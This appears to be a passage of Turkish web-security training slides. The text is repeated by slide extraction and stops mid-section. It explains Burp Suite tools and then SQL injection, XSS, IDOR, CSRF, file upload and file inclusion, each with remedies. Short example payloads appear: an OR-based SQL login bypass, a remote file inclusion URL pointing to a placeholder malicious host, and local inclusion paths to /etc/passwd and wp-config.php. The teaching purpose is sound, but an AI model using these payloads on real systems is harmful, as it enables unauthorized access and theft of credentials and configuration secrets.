© All Rights Reserved.
88
Burp Suite Spider - Crawler Ayarları
• Request the root of all directories: Site içerisinde tüm dizinlerin indexlenmesi için seçilir.
89. www.prismacsi.com
© All Rights Reserved.
89
www.prismacsi.com
© All Rights Reserved.
89
www.prismacsi.com
© All Rights Reserved.
89
www.prismacsi.com
© All Rights Reserved.
89
Burp Suite Spider - Passive Spidering
• Passively spider as you browse: Burp Suite üzerinden geçen tüm istekleri ve yanıtları takip eder.
90. www.prismacsi.com
© All Rights Reserved.
90
www.prismacsi.com
© All Rights Reserved.
90
www.prismacsi.com
© All Rights Reserved.
90
www.prismacsi.com
© All Rights Reserved.
90
Burp Suite Spider - Form Submission
• Individuate forms: Burp Suite yeni bir formla karşılaştığında diğer sekmesine eklenmesi için kullanılır.
91. www.prismacsi.com
© All Rights Reserved.
91
www.prismacsi.com
© All Rights Reserved.
91
www.prismacsi.com
© All Rights Reserved.
91
www.prismacsi.com
© All Rights Reserved.
91
Burp Suite Spider - Form Submission
• Prompt for guidance: Burp Suite her formla karşılaştığında formun nasıl submit edileceğini kullanıcıya sorar.
92. www.prismacsi.com
© All Rights Reserved.
92
www.prismacsi.com
© All Rights Reserved.
92
www.prismacsi.com
© All Rights Reserved.
92
www.prismacsi.com
© All Rights Reserved.
92
Burp Suite Spider - Form Submission
• Automatically submit: Burp Suite her formla karşılaştığında formun otamatik doldurup submit eder.
93. www.prismacsi.com
© All Rights Reserved.
93
www.prismacsi.com
© All Rights Reserved.
93
www.prismacsi.com
© All Rights Reserved.
93
www.prismacsi.com
© All Rights Reserved.
93
Burp Suite Spider - Application Login
• Handle as ordinary forms: Burp Suite login formlarında nasıl konfigürasyon yapıldıysak ona göre aksiyon
alınmasını sağlar
94. www.prismacsi.com
© All Rights Reserved.
94
www.prismacsi.com
© All Rights Reserved.
94
www.prismacsi.com
© All Rights Reserved.
94
www.prismacsi.com
© All Rights Reserved.
94
Burp Suite Spider - Application Login
• Automatically submit these credentials: Kullanıcı ad Şifre bilgilerini otomatik olarak doldurup submit eder.
95. www.prismacsi.com
© All Rights Reserved.
95
www.prismacsi.com
© All Rights Reserved.
95
www.prismacsi.com
© All Rights Reserved.
95
www.prismacsi.com
© All Rights Reserved.
95
Burp Suite Spider - Spider Engine
• Spider için ayarlamaların yapıldığı kısımdır. Threat, hata sonrası deneme sayısı gibi ayarlar yapılabilir.
96. www.prismacsi.com
© All Rights Reserved.
96
www.prismacsi.com
© All Rights Reserved.
96
www.prismacsi.com
© All Rights Reserved.
96
www.prismacsi.com
© All Rights Reserved.
96
Burp Suite Spider - Requests Headers
• Yapılacak olan isteklerde Header bilgilerinin belirlendiği kısımdır.
97. www.prismacsi.com
© All Rights Reserved.
97
www.prismacsi.com
© All Rights Reserved.
97
www.prismacsi.com
© All Rights Reserved.
97
www.prismacsi.com
© All Rights Reserved.
97
Burp Suite Spider Kullanımı - Requests Headers
• Controls sekmesinde işlemi başlatabilirsiniz.
98. www.prismacsi.com
© All Rights Reserved.
98
www.prismacsi.com
© All Rights Reserved.
98
www.prismacsi.com
© All Rights Reserved.
98
www.prismacsi.com
© All Rights Reserved.
98
Burp Suite Intruder Kullanımı
• Intruder otomatize olarak zafiyet taraması yapıp exploit edilmesi için kullanılır.
• SQLi, XSS vb popüler zafiyetler bulunabilir.
• Brute Force atak yapılabilir.
• Yanlış konfigürasyon yüzünden hassas verilere erişilebilir.
99. www.prismacsi.com
© All Rights Reserved.
99
www.prismacsi.com
© All Rights Reserved.
99
www.prismacsi.com
© All Rights Reserved.
99
www.prismacsi.com
© All Rights Reserved.
99
Burp Suite Intruder Kullanımı
• HTTP History sekmesinde önceden yaptığımız isteklerden sağ tıkla Send to Intruder seçeneğiyle intruder yollanır.
100. www.prismacsi.com
© All Rights Reserved.
10
0
www.prismacsi.com
© All Rights Reserved.
10
0
www.prismacsi.com
© All Rights Reserved.
10
0
www.prismacsi.com
© All Rights Reserved.
10
0
Burp Suite Intruder Kullanımı
• Burp Suite bizim için değişkenleri taralı hale getirir. Sağ sütundaki butonlar yardımıyla ekleme, silme, otomatik
belirleme yapılabilir.
101. www.prismacsi.com
© All Rights Reserved.
10
1
www.prismacsi.com
© All Rights Reserved.
10
1
www.prismacsi.com
© All Rights Reserved.
10
1
www.prismacsi.com
© All Rights Reserved.
10
1
Burp Suite Intruder Kullanımı
• Örnek olarak bir kaba kuvvet saldırısı için değişkenlerdeki password kısmı seçilerek Payloads sekmesinden
seçilen wordlist ile atak başlatılabilir.
102. www.prismacsi.com
© All Rights Reserved.
10
2
www.prismacsi.com
© All Rights Reserved.
10
2
www.prismacsi.com
© All Rights Reserved.
10
2
www.prismacsi.com
© All Rights Reserved.
10
2
Burp Suite Intruder Kullanımı - Saldırı Tipleri
• Sniper: Örnektede bahsettiğimiz gibi tek bir parametreyi hedef alan saldırılarda kullanılır.
103. www.prismacsi.com
© All Rights Reserved.
10
3
www.prismacsi.com
© All Rights Reserved.
10
3
www.prismacsi.com
© All Rights Reserved.
10
3
www.prismacsi.com
© All Rights Reserved.
10
3
Burp Suite Intruder Kullanımı - Saldırı Tipleri
• Batterin ram: Birden fazla parametreli saldırılarda kullanılır ancak tüm parametrelere aynı payload kullanılarak
deneme yapılır.
104. www.prismacsi.com
© All Rights Reserved.
10
4
www.prismacsi.com
© All Rights Reserved.
10
4
www.prismacsi.com
© All Rights Reserved.
10
4
www.prismacsi.com
© All Rights Reserved.
10
4
Burp Suite Intruder Kullanımı - Saldırı Tipleri
• Pitchfork: Tüm parametrelere farklı payload kullanılarak deneme yapılır. Çoklu listeden parametre sırasına göre
denemeler yapılır.
105. www.prismacsi.com
© All Rights Reserved.
10
5
www.prismacsi.com
© All Rights Reserved.
10
5
www.prismacsi.com
© All Rights Reserved.
10
5
www.prismacsi.com
© All Rights Reserved.
10
5
Burp Suite Intruder Kullanımı - Saldırı Tipleri
• Cluster Bomb: Tüm parametrelere farklı payload kullanılır. Listeden parametre sırasına göre çapraz denemeler
yapılır.
106. www.prismacsi.com
© All Rights Reserved.
10
6
www.prismacsi.com
© All Rights Reserved.
10
6
www.prismacsi.com
© All Rights Reserved.
10
6
www.prismacsi.com
© All Rights Reserved.
10
6
Burp Suite Repeater Kullanımı
• Repeater manuel olarak yapılan isteklerde değişiklik yapmamıza yardımcı olur.
107. www.prismacsi.com
© All Rights Reserved.
10
7
www.prismacsi.com
© All Rights Reserved.
10
7
www.prismacsi.com
© All Rights Reserved.
10
7
www.prismacsi.com
© All Rights Reserved.
10
7
Burp Suite Repeater Kullanımı
• Proxy sekmesinde HTTP History sekmesine gidip hedef adreslerden birine sağ tıklayarak Send to Repeater
seçeneğiyle kullanılır.
108. www.prismacsi.com
© All Rights Reserved.
10
8
www.prismacsi.com
© All Rights Reserved.
10
8
www.prismacsi.com
© All Rights Reserved.
10
8
www.prismacsi.com
© All Rights Reserved.
10
8
Burp Suite Repeater Kullanımı
• Repeater a yollanan istekler Repeater sekmesinden incelenir. İsteklerde değişiklikler yapıp geri dönüşler kolayca
görülebilir.
109. www.prismacsi.com
© All Rights Reserved.
10
9
www.prismacsi.com
© All Rights Reserved.
10
9
www.prismacsi.com
© All Rights Reserved.
10
9
www.prismacsi.com
© All Rights Reserved.
10
9
Burp Suite Sequencer Kullanımı
• Sequencer üretilen tokenlerin rasgelelik derecesini analiz etmeye yarar.
110. www.prismacsi.com
© All Rights Reserved.
11
0
www.prismacsi.com
© All Rights Reserved.
11
0
www.prismacsi.com
© All Rights Reserved.
11
0
www.prismacsi.com
© All Rights Reserved.
11
0
Burp Suite Sequencer Kullanımı
• Web uygulaması tarafından kullanıcıya oturum açıldıktan sonra üretilen ve kullanıcının her yaptığı istekte web
uygulamasına kendini tanıtmak amacıyla yolladığı bu keye Session key adı verilir. Sequencer’ın yapmaya çalıştığı
bu keylerin tahmin edilebilirliğini kontrol etmektir.
111. www.prismacsi.com
© All Rights Reserved.
11
1
www.prismacsi.com
© All Rights Reserved.
11
1
www.prismacsi.com
© All Rights Reserved.
11
1
www.prismacsi.com
© All Rights Reserved.
11
1
Burp Suite Sequencer Kullanımı
• Sequencer’a yollanan isteği Token Location Within Response kısmında PHPSESSID tutulduğunu görürüz
112. www.prismacsi.com
© All Rights Reserved.
11
2
www.prismacsi.com
© All Rights Reserved.
11
2
www.prismacsi.com
© All Rights Reserved.
11
2
www.prismacsi.com
© All Rights Reserved.
11
2
Burp Suite Sequencer Kullanımı
• PHPSESSID’ı seçip Start Live Capture a tıklayarak Burp Suite’in uygulamaya istekler yaparak PHPSESSID
toplamasını sağlıyoruz.
113. www.prismacsi.com
© All Rights Reserved.
11
3
www.prismacsi.com
© All Rights Reserved.
11
3
www.prismacsi.com
© All Rights Reserved.
11
3
www.prismacsi.com
© All Rights Reserved.
11
3
Burp Suite Sequencer Kullanımı
• PHPSESSID’ı seçip Start Live Capture a tıklayarak Burp Suite’in uygulamaya istekler yaparak PHPSESSID
toplamasını sağlıyoruz.
114. www.prismacsi.com
© All Rights Reserved.
11
4
www.prismacsi.com
© All Rights Reserved.
11
4
www.prismacsi.com
© All Rights Reserved.
11
4
www.prismacsi.com
© All Rights Reserved.
11
4
Burp Suite Sequencer Kullanımı
• Toplanan PHPSESSID’lerin sayısı ne kadar artarsa yapılacak analizin doğruluk oranı arttığı
unutulmamalıdır.
115. www.prismacsi.com
© All Rights Reserved.
11
5
www.prismacsi.com
© All Rights Reserved.
11
5
www.prismacsi.com
© All Rights Reserved.
11
5
www.prismacsi.com
© All Rights Reserved.
11
5
Burp Suite Comparer Kullanımı
• Comparer iki istek yada iki yanıt arasındaki farkı anlamamıza yardımcı olur.
116. www.prismacsi.com
© All Rights Reserved.
11
6
www.prismacsi.com
© All Rights Reserved.
11
6
www.prismacsi.com
© All Rights Reserved.
11
6
www.prismacsi.com
© All Rights Reserved.
11
6
Burp Suite Comparer Kullanımı
• İsteği sağ tık menüsünden Comparer’e yönlendirilir.
117. www.prismacsi.com
© All Rights Reserved.
11
7
www.prismacsi.com
© All Rights Reserved.
11
7
www.prismacsi.com
© All Rights Reserved.
11
7
www.prismacsi.com
© All Rights Reserved.
11
7
Burp Suite Comparer Kullanımı
• Karşılaştırılmasını istediğimiz 2 isteği seçerek sağ alttan Words veya Bytes türünden karşılaştırılır.
118. www.prismacsi.com
© All Rights Reserved.
11
8
www.prismacsi.com
© All Rights Reserved.
11
8
www.prismacsi.com
© All Rights Reserved.
11
8
www.prismacsi.com
© All Rights Reserved.
11
8
Burp Suite Eklentileri
• Burp Suite’e çeşitli eklentiler kurarak yeteneklerini arttırabiliriz.
119. www.prismacsi.com
© All Rights Reserved.
11
9
www.prismacsi.com
© All Rights Reserved.
11
9
www.prismacsi.com
© All Rights Reserved.
11
9
www.prismacsi.com
© All Rights Reserved.
11
9
Burp Suite Eklentileri
• Extender - BApp Store’dan istediğimiz eklentiyi seçip install butonu ile kurulumu gerçekleştiriyoruz.
120. www.prismacsi.com
© All Rights Reserved.
12
0
www.prismacsi.com
© All Rights Reserved.
12
0
www.prismacsi.com
© All Rights Reserved.
12
0
www.prismacsi.com
© All Rights Reserved.
12
0
Zafiyetler
121. www.prismacsi.com
© All Rights Reserved.
12
1
www.prismacsi.com
© All Rights Reserved.
12
1
www.prismacsi.com
© All Rights Reserved.
12
1
www.prismacsi.com
© All Rights Reserved.
12
1
SQL Injection
122. www.prismacsi.com
© All Rights Reserved.
12
2
www.prismacsi.com
© All Rights Reserved.
12
2
www.prismacsi.com
© All Rights Reserved.
12
2
www.prismacsi.com
© All Rights Reserved.
12
2
SQL Injection Zafiyeti Nedir?
• Saldırganların, uygulama girdi noktaları üzerinden, sistemin veritabanına müdahale edebilecek zafiyetleri
bölümleri tespit edip, buralardan veritabanı işlemleri yapmasıdır.
123. www.prismacsi.com
© All Rights Reserved.
12
3
www.prismacsi.com
© All Rights Reserved.
12
3
www.prismacsi.com
© All Rights Reserved.
12
3
www.prismacsi.com
© All Rights Reserved.
12
3
SQL Injection Zafiyetinin Sebebi Nedir?
• Uygulamalar belirli sorguları dinamik olarak gerçekleştirmektedir.
• Kullanıcıdan gelebilecek olan veriler güvenli kabul edilerek, herhangi bir işlemden geçmeden, direk olarak SQL
kodu içerisinde işletilmesi durumu bu zafiyeti ortaya çıkarmaktadır.
124. www.prismacsi.com
© All Rights Reserved.
12
4
www.prismacsi.com
© All Rights Reserved.
12
4
www.prismacsi.com
© All Rights Reserved.
12
4
www.prismacsi.com
© All Rights Reserved.
12
4
SQL Injection Zafiyetinin Zararları Nedir?
• Zafiyeti tespit eden saldırganlar veritabanı üzerinde;
• Veri silme
• Veri güncelleme
• Ver ekleme
İşlemleri gerçekleştirebilir.
• Ayrıca bu zafiyeti kullanıp sisteme zararlı dosya yükleyebilir ve sistemi ele geçirebilir.
• Teknik anlamda veri ifşasıyla sonuçlanacak bir saldırı firmayı ciddi manada itibar kaybına ve maddi kayba neden
olabilir.
125. www.prismacsi.com
© All Rights Reserved.
12
5
www.prismacsi.com
© All Rights Reserved.
12
5
www.prismacsi.com
© All Rights Reserved.
12
5
www.prismacsi.com
© All Rights Reserved.
12
5
Uygulama – Login Bypass
• Kullanıcı site üzerinde kullanıcı adı ve parola bilgilerini girip ardından Giriş Yap butonuna tıklar.
• Uygulama sunucusu bu bilgileri alır ve Veritabanı üzerinde bu bilgilerin doğruluğuna dair sorgu işlemi
gerçekleştirir.
• Eğer bilgiler doğru girilmişse TRUE değeri döner ve yetki içi Cookie atanır. Eğer bilgiler yanlış girilmişse FALSE
değeri döner ve Kullanıcı adı veya Parola yanlış şeklinde uyarı verir.
hakan 123456
Sunucu Veritabanı
eposta=hakan&parola=123456
SELECT * FROM USERS WHERE
EPOSTA=hakan AND
PAROLA=123456;
FALSEKullanıcı adı veya Parola yanlış
1 2
34İstemci
126. www.prismacsi.com
© All Rights Reserved.
12
6
www.prismacsi.com
© All Rights Reserved.
12
6
www.prismacsi.com
© All Rights Reserved.
12
6
www.prismacsi.com
© All Rights Reserved.
12
6
Uygulama – Login Bypass
• Saldırgan site üzerinde input alanlarına SQL komutu içeren içerik yazıp Giriş Yap butonuna tıklar.
• Uygulama sunucusu bu bilgileri alır ve Veritabanı üzerinde bu bilgilerin doğruluğuna dair sorgu işlemi
gerçekleştirir.
• Saldırgandan alınan input her halükarda TRUE değer döndürür.
• Bundan ötürü veritabanı Sunucuya TRUE değeri döndürür ve Uygulama sunucusu Cookie atayarak kullanıcıyı
yetkilendirir.
hakan 123456
İstemci Sunucu Veritabanı
eposta=hakan&parola=123456’ OR 2=2
SELECT * FROM USERS WHERE
EPOSTA=hakan AND
PAROLA=123456’ OR 2=2;
TRUESet-Cookie: SessionId=…
1 2
34
127. www.prismacsi.com
© All Rights Reserved.
12
7
www.prismacsi.com
© All Rights Reserved.
12
7
www.prismacsi.com
© All Rights Reserved.
12
7
www.prismacsi.com
© All Rights Reserved.
12
7
SQL Injection Zafiyetinin Çözümü Nedir?
• SQL sorgularını direk olarak işlemek yerine parametreli kullanım şeklinde kullanmak gerekmektedir.
• Buna ek olarak kullanıcıdan gelen tüm veriler white-list (beyaz liste) yöntemine göre işletilerek işleme alınabilir.
• Stored Prosedure yöntemi kullanarak bu zafiyetin önüne geçmek mümkündür.
128. www.prismacsi.com
© All Rights Reserved.
12
8
www.prismacsi.com
© All Rights Reserved.
12
8
www.prismacsi.com
© All Rights Reserved.
12
8
www.prismacsi.com
© All Rights Reserved.
12
8
SQL Injection Korunma Yolları
• Worse Code
SELECT account_balance FROM user_data WHERE user_name = + request.getParameter("customerName");
• Best Code
SELECT account_balance FROM user_data WHERE user_name = ?;
command.Parameters.Add(new OleDbParameter("user_name", CustomerName Name.Text));
129. www.prismacsi.com
© All Rights Reserved.
12
9
www.prismacsi.com
© All Rights Reserved.
12
9
www.prismacsi.com
© All Rights Reserved.
12
9
www.prismacsi.com
© All Rights Reserved.
12
9
SQL Injection
Uygulama
130. www.prismacsi.com
© All Rights Reserved.
13
0
www.prismacsi.com
© All Rights Reserved.
13
0
www.prismacsi.com
© All Rights Reserved.
13
0
www.prismacsi.com
© All Rights Reserved.
13
0
Cross Site Scripting (XSS)
131. www.prismacsi.com
© All Rights Reserved.
13
1
www.prismacsi.com
© All Rights Reserved.
13
1
www.prismacsi.com
© All Rights Reserved.
13
1
www.prismacsi.com
© All Rights Reserved.
13
1
XSS Zafiyeti Nedir?
• Web uygulaması üzerinde, kullanıcıdan gelen verilerin herhangi bir işlemden geçmeden direk olarak
ekrana basılması durumunda, tarayıcılar tarafından bu veriler uygulama kodu olarak kabul edilir ve
işletilir. Bunun sonucunda bu bölümler Javascript gibi tarayıcı tarafından yorumlanan dillerle manipüle
edilerek kötüye kullanılır ve XSS zafiyetinden söz edilir.
• Javascript haricinde VBScript gibi tarayıcıların yorumladığı diğer programlama dilleriylede bu zafiyet
tetiklenebilir.
132. www.prismacsi.com
© All Rights Reserved.
13
2
www.prismacsi.com
© All Rights Reserved.
13
2
www.prismacsi.com
© All Rights Reserved.
13
2
www.prismacsi.com
© All Rights Reserved.
13
2
XSS Zafiyetinin Sebebi Nedir?
• Web uygulaması üzerinde, kullanıcıdan beklenen girdilerin hiçbir filtreleme işlemine sokulmadan aynı
şekilde kullanıcıya yansıtılması durumunda bu zafiyet ortaya çıkmaktadır.
133. www.prismacsi.com
© All Rights Reserved.
13
3
www.prismacsi.com
© All Rights Reserved.
13
3
www.prismacsi.com
© All Rights Reserved.
13
3
www.prismacsi.com
© All Rights Reserved.
13
3
XSS Zafiyet Türleri Nelerdir?
• Literatürde Reflected, Stored ve DOM Based şeklinde 3 farklı XSS türü vardır.
• Reflected XSS: Bu saldırı tipinde Javascript kodlarının kullanıcı tarafından bir linke tıklanarak tetiklenmesi
sağlanır.
• Stored XSS: Javascript kodları bir kere uygulamaya eklenir. Daha sonra bu sayfaya erişen her tarayıcıda bu
Javascript kodları çalıştırılır. Myspace örneği.
• DOM Based XSS: DOM nesnesi üzerinden Javascript kodlarının çalıştırılmasıdır. Örneğin sayfa içerisinde
gezinmemizi sağlayan #(anchor) nesnesi bu zafiyete örnek olarak verilebilir.
134. www.prismacsi.com
© All Rights Reserved.
13
4
www.prismacsi.com
© All Rights Reserved.
13
4
www.prismacsi.com
© All Rights Reserved.
13
4
www.prismacsi.com
© All Rights Reserved.
13
4
XSS Zafiyetinin Zararları Nedir?
• Bu zafiyet ile birlikte saldırganlar kullanıcıların oturum bilgilerini çalabilir, tarayıcıyı ele geçirebilir, browser
üzerinden farklı sistemlere saldırıda bulunabilir, kısacası Javascript kullanarak yapılabilecek her türlü
işlemi gerçekleştirebilir.
135. www.prismacsi.com
© All Rights Reserved.
13
5
www.prismacsi.com
© All Rights Reserved.
13
5
www.prismacsi.com
© All Rights Reserved.
13
5
www.prismacsi.com
© All Rights Reserved.
13
5
XSS Zafiyetinin Çözümü Nedir?
• Kullanıcıya sunulan metinler Output Encoding işleminden geçirilerek sunulmalıdır. Böylece tarayıcılar özel
karakterlerin bulunduğu girdileri komutmuş gibi algılamayacak ve işletmeyecektir.
• Script tagları içerisine kullanıcıdan gelebilecek olan değerler direkt olarak yazılmamalıdır.
136. www.prismacsi.com
© All Rights Reserved.
13
6
www.prismacsi.com
© All Rights Reserved.
13
6
www.prismacsi.com
© All Rights Reserved.
13
6
www.prismacsi.com
© All Rights Reserved.
13
6
XSS - Uygulamalar
• The Browser Exploitation Framework (BeEF)
• Reflected XSS
• Stored XSS
• DOM Based XSS
• Keylogger
137. www.prismacsi.com
© All Rights Reserved.
13
7
www.prismacsi.com
© All Rights Reserved.
13
7
www.prismacsi.com
© All Rights Reserved.
13
7
www.prismacsi.com
© All Rights Reserved.
13
7
XSS - Uygulamalar
• BeEF dışında hazır XSS payloadları için www.xss-payloads.com sitesinden payloadlara erişim sağlanabilir.
138. www.prismacsi.com
© All Rights Reserved.
13
8
www.prismacsi.com
© All Rights Reserved.
13
8
www.prismacsi.com
© All Rights Reserved.
13
8
www.prismacsi.com
© All Rights Reserved.
13
8
Insecure Direct Object
References (IDOR)
139. www.prismacsi.com
© All Rights Reserved.
13
9
www.prismacsi.com
© All Rights Reserved.
13
9
www.prismacsi.com
© All Rights Reserved.
13
9
www.prismacsi.com
© All Rights Reserved.
13
9
Insecure Direct Object References (IDOR) Zafiyeti Nedir?
• Kullanıcının yetkisi haricindeki dosyalara erişim sağlayabilmesi durumunda bu zafiyetten söz edilebilir.
Kendi banka hesap profilinizdeyken başkalarının banka hesap bilgilerini görebilmeniz bu zafiyete güzel bir
örnek olabilir.
• Yaşanmış hikaye: Fatura senaryosu
140. www.prismacsi.com
© All Rights Reserved.
14
0
www.prismacsi.com
© All Rights Reserved.
14
0
www.prismacsi.com
© All Rights Reserved.
14
0
www.prismacsi.com
© All Rights Reserved.
14
0
IDOR Zafiyetinin Sebebi Nedir?
• Kullanıcıların yaptıkları istekleri yetki kontrolüne (authentication) göre kontrol etmeden yalnızca kimlik
doğrulaması yaparak (authorization) kontrol edilip işleme alınması zafiyetin ana sebebidir.
• Ayrıca yapılan isteklerin ID gibi değişkenlere bağlı olarak yapılması bu zafiyeti tetiklemektedir.
141. www.prismacsi.com
© All Rights Reserved.
14
1
www.prismacsi.com
© All Rights Reserved.
14
1
www.prismacsi.com
© All Rights Reserved.
14
1
www.prismacsi.com
© All Rights Reserved.
14
1
IDOR Zafiyetinin Zararları Nedir?
• Bu zafiyet ile birlikte saldırganlar yetkisi dahilinde olmayan işlemleri gerçekleştirebileceği için ilk akla
gelen senaryolar; başkalarına ait gizli dosyaları ele geçirebilir, bankacılık gibi finansal uygulamalarda
başka kişilere ait hesap bilgilerini görebilir ve başka kullanıcıların parola bilgilerini değiştirip sisteme
erişim sağlayabilir. Bu durumlar sonucunda firma büyük oranda maddi kayba ve itibar kaybına
uğrayabilir.
142. www.prismacsi.com
© All Rights Reserved.
14
2
www.prismacsi.com
© All Rights Reserved.
14
2
www.prismacsi.com
© All Rights Reserved.
14
2
www.prismacsi.com
© All Rights Reserved.
14
2
IDOR Zafiyetinin Çözümü Nedir?
• Uygulama fonksiyonlarına yapılan her sorguda mutlaka yetki kontrollerinin doğru bir şekilde yapılıyor
olması gerekmektedir.
• Yapılan istekler mümkünse ID gibi değişkenler üzerinden değil yetki dahilinde fonksiyonlar üzerinden
gerçekleştirilmelidir.
143. www.prismacsi.com
© All Rights Reserved.
14
3
www.prismacsi.com
© All Rights Reserved.
14
3
www.prismacsi.com
© All Rights Reserved.
14
3
www.prismacsi.com
© All Rights Reserved.
14
3
IDOR
Uygulama
144. www.prismacsi.com
© All Rights Reserved.
14
4
www.prismacsi.com
© All Rights Reserved.
14
4
www.prismacsi.com
© All Rights Reserved.
14
4
www.prismacsi.com
© All Rights Reserved.
14
4
CSRF
145. www.prismacsi.com
© All Rights Reserved.
14
5
www.prismacsi.com
© All Rights Reserved.
14
5
www.prismacsi.com
© All Rights Reserved.
14
5
www.prismacsi.com
© All Rights Reserved.
14
5
CSRF (Cross-Site Request Forgery)
• Tarayıcılar, bir siteye istek yapıldığında öncelikle kendi üzerinde bu site ile iligli herhangi bir cookie olup
olmadığını kontrol ederler. Eğer cookie mevcutsa yapılan istekte HTTP başlık bilgisine bu Cookie değeri
eklenip istekte bulunulur. Bu mekanizma sayesinde web uygulamalarına durum kontrolü kazanmış olur ve
örneğin sürekli olarak sisteme giriş için kullanıcı adı parola girmeye gerek kalmaz.
146. www.prismacsi.com
© All Rights Reserved.
14
6
www.prismacsi.com
© All Rights Reserved.
14
6
www.prismacsi.com
© All Rights Reserved.
14
6
www.prismacsi.com
© All Rights Reserved.
14
6
CSRF (Cross-Site Request Forgery)
• Saldırgan kişiler bu mekanizmayı kötüye kullanmak için hedef web uygulamasında işlem yapan kodların
bulunduğu bir sayfa hazırlanır. Kurbanlar, bu sayfayı ziyaret ederek farkında olmadan arka planda hedef
sisteme istekte bulunmuş olurlar. İstek sırasında tarayıcı da Cookie bilgisini eklediğinden bir anda web
uygulaması üzerinde yetkili bir kullanıcıyla işlem yapılmış olunur.
• Burada zafiyetin temel sebebi kullanıcıdan gelen isteklerin istek başına tek kullanımlık özel bir token
kullanılmadan sadece Cookie ve Session bilgisiyle yapılmasından kaynaklandığı görülmektedir.
147. www.prismacsi.com
© All Rights Reserved.
14
7
www.prismacsi.com
© All Rights Reserved.
14
7
www.prismacsi.com
© All Rights Reserved.
14
7
www.prismacsi.com
© All Rights Reserved.
14
7
CSRF (Cross-Site Request Forgery)
• Hedef sistemin bir bankacılık uygulaması olduğu ve yapılan işlemin para aktarma işlemi olduğu
düşünülürse zafiyetin ne denli zararlı olduğu görülebilir.
• Zafiyetin bulunduğu tüm fonksiyonlar (Para aktarma, kullanıcı ekleme, kullanıcı silme, hesap açma vb.) bu
zafiyet ile birlikte tetiklenebilir.
148. www.prismacsi.com
© All Rights Reserved.
14
8
www.prismacsi.com
© All Rights Reserved.
14
8
www.prismacsi.com
© All Rights Reserved.
14
8
www.prismacsi.com
© All Rights Reserved.
14
8
CSRF (Cross-Site Request Forgery)
• CSRF Token mekanizması doğru bir şekilde kullanılarak bu zafiyet çözüme kavuşturulabilir.
• Token’ın her istek sonrasında yenilendiğinden emin olunmalıdır.
• Token’ların tek kullanım hakkı olduğu ve buna göre işlem yapılması gerekmektedir.
149. www.prismacsi.com
© All Rights Reserved.
14
9
www.prismacsi.com
© All Rights Reserved.
14
9
www.prismacsi.com
© All Rights Reserved.
14
9
www.prismacsi.com
© All Rights Reserved.
14
9
CSRF
Uygulama
150. www.prismacsi.com
© All Rights Reserved.
15
0
www.prismacsi.com
© All Rights Reserved.
15
0
www.prismacsi.com
© All Rights Reserved.
15
0
www.prismacsi.com
© All Rights Reserved.
15
0
FileUpload Zafiyeti Nedir?
• Saldırgan kişilerin sisteme zararlı dosya (genellikle shell, web shell şeklinde isimlendirilir) yüklemesidir.
• Oldukça tehlikeli ve saldırgana sisteme erişim verecek bir zafiyet tipidir.
• Genelde testler sırasında bir dosya yükleme alanı gördüğümüzde yüzümüzde küçük bir tebessüm oluşuyor
J
151. www.prismacsi.com
© All Rights Reserved.
15
1
www.prismacsi.com
© All Rights Reserved.
15
1
www.prismacsi.com
© All Rights Reserved.
15
1
www.prismacsi.com
© All Rights Reserved.
15
1
FileUpload Zafiyetinin Sebebi Nedir?
• Kullanıcıdan gelen dosyaların güvenli kabul edilerek ve hiçbir kontrolden geçirmeyerek sisteme yüklenmesi
bu zafiyetin ana sebebidir.
• Örneğin resim beklenen bölüme php kodu içeren bir dosya yüklenmesi.
• Yapılan kontrollerin yetersiz olması da zafiyete sebep olabilir.
• Blacklist yöntemi de aynı şekilde.
152. www.prismacsi.com
© All Rights Reserved.
15
2
www.prismacsi.com
© All Rights Reserved.
15
2
www.prismacsi.com
© All Rights Reserved.
15
2
www.prismacsi.com
© All Rights Reserved.
15
2
FileUpload Zafiyetinin Zararları Nedir?
• Çok tehlikeli bir zafiyettir.
• Yüklenen Shell’in içeriğine göre işlemler yapılabilir.
• Çoğu senaryoda sistemler ele geçirilmektedir.
• İç networke geçiş için kullanılabilecek bir nokta.
153. www.prismacsi.com
© All Rights Reserved.
15
3
www.prismacsi.com
© All Rights Reserved.
15
3
www.prismacsi.com
© All Rights Reserved.
15
3
www.prismacsi.com
© All Rights Reserved.
15
3
FileUpload Zafiyetinin Çözümü Nedir?
• Kullanıcıdan gelen tüm dosyaların istenen formatta olup olmadığı kontrol edilmelidir. (Uzantı kontrolü)
• Yüklenen dosyaların mime type kontrolü yapılmalıdır.
• Dosyalar whitelist metoduna göre kabul edilmelidir.
• Dosyanın yüklendiği dizin kullanıcıya gösterilmemeli ve dışarıdan erişilebilir olmamalıdır.
• Dosya yüklenirken isim rastgele isim atanmalıdır.
154. www.prismacsi.com
© All Rights Reserved.
15
4
www.prismacsi.com
© All Rights Reserved.
15
4
www.prismacsi.com
© All Rights Reserved.
15
4
www.prismacsi.com
© All Rights Reserved.
15
4
File Upload
Uygulama
155. www.prismacsi.com
© All Rights Reserved.
15
5
www.prismacsi.com
© All Rights Reserved.
15
5
www.prismacsi.com
© All Rights Reserved.
15
5
www.prismacsi.com
© All Rights Reserved.
15
5
File Inclusion Zafiyeti Nedir?
• Remote File Inclusion
• Uzak sunucuda bulunan bir dosyanın web uygulaması üzerinden çağırılmasıdır.
• Eğer çağırılan dosyanın içeriği uygulama sunucusunda yorumlanan bir içerikse (örneğin PHP) bu
içerik sunucu tarafından yorumlanır ve öyle sunulur. WEB SHELL!
• http://site/rfi.php?file=http://zararli/rfi_url
• Local File Inclusion
• Yerel sunucuda bulunan bir dosyanın web uygulaması üzerinden çağırılmasıdır.
• Genellikle config dosyaları, sisteme yüklenen shell dosyaları, gizli bilgi içerebilecek dosyalara erişim
sağlanmaya çalışılır.
• http://site/index.php?file=../../../../etc/passwd
• http://site/index.php?file=../wp-config.php
156. www.prismacsi.com
© All Rights Reserved.
15
6
www.prismacsi.com
© All Rights Reserved.
15
6
www.prismacsi.com
© All Rights Reserved.
15
6
www.prismacsi.com
© All Rights Reserved.
15
6
File Inclusion Zafiyetinin Sebebi Nedir?
• Bu zafiyetin temel sebebi çağırılan dosyaların yeteri kadar kontrol edilmemesinden kaynaklanmaktadır.
Örneğin çağırılan dosya aynı domainde mi bulunuyor?
• Çağırılan dosya adresinde özel karakter (. / gibi) barınıyor mu?
• Belirtilen dosya isimleri dışında başka dosyalara erişim sağlanıyor mu? gibi
157. www.prismacsi.com
© All Rights Reserved.
15
7
www.prismacsi.com
© All Rights Reserved.
15
7
www.prismacsi.com
© All Rights Reserved.
15
7
www.prismacsi.com
© All Rights Reserved.
15
7
File Inclusion Zafiyetinin Zararları Nedir?
